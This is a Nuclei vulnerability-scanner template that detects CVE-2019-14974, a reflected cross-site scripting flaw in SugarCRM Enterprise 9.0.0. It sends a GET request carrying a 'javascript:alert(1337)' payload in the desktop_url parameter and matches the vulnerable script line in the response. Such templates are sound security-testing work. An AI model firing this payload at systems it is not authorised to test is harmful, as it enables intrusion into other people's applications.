nuclei-templates/cves/CVE-2019-14974.yaml

21 lines
482 B
YAML

id: cve-2019-14974
info:
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
author: madrobot
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "url = window.location.search.split(\"?desktop_url=\")[1]"
part: body